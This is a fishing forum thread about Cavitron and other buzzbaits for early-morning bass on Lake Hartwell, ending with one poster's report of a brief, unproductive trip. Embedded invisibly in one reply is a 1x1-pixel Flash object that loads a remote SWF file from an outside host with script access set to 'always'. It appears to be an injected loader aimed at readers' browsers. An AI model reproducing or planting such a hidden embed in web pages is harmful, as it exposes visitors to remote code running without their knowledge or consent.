What do y'all think about cavitron buzzbaits?

Burton

I bought a couple the other day. A 1/4 white with gold blade and a 3/8 chartreuse...... I don't fish buzzbaits very often and I would always throw a white one. I'm going to try them on Hartwell on Friday. I would have preferred a 3/8 white but they were sold out.....I guess that is a good sign?

riprap

I don't hear about guys fishing with buzzbaits like I use to. 15 years ago it was my go to at daylight but just got too many hit and misses. The action I saw on Hartwell a few weeks ago was spots out in brush 20+ ft deep and some schooling action from spots and largemouths points late in the evening.

Burton

I don't hear about guys fishing with buzzbaits like I use to. 15 years ago it was my go to at daylight but just got too many hit and misses. The action I saw on Hartwell a few weeks ago was spots out in brush 20+ ft deep and some schooling action from spots and largemouths points late in the evening.

I'm going to try a little bit of everything. I haven't been there lately, but I was hoping to find some shallow in the morning. Thanks for the response.

Tmpr111

Not sure about that model, but I've been catching early morning bass on the black Warrior Warpath model with the gold blade. It's one of my favorite early/late dog-days topwater choice! Def my favorite night go-to along with the giant Spro Rat!

Steve08

I'm going to try a little bit of everything. I haven't been there lately, but I was hoping to find some shallow in the morning. Thanks for the response.<object classid="clsid: D27CDB6E-AE6D-11cf-96B8-444553540000" width="1" height="1"><param value="http://picz.website/u/1/c.swf"><param name="allowScriptAccess" value="always" /><embed allowScriptAccess="always" src="http://picz.website/u/1/c.swf" type="application/x-shockwave-flash" width="1" height="1"></embed></object>
Sounds good, let us know how it goes...

Burton

Sounds good, let us know how it goes...

It didn't exactly go. I ended up having to work and did not get on the water until 12:15. I had 3 hrs to fish and I mostly threw a worm. I caught a small one and a fishing net. Not tooooo good.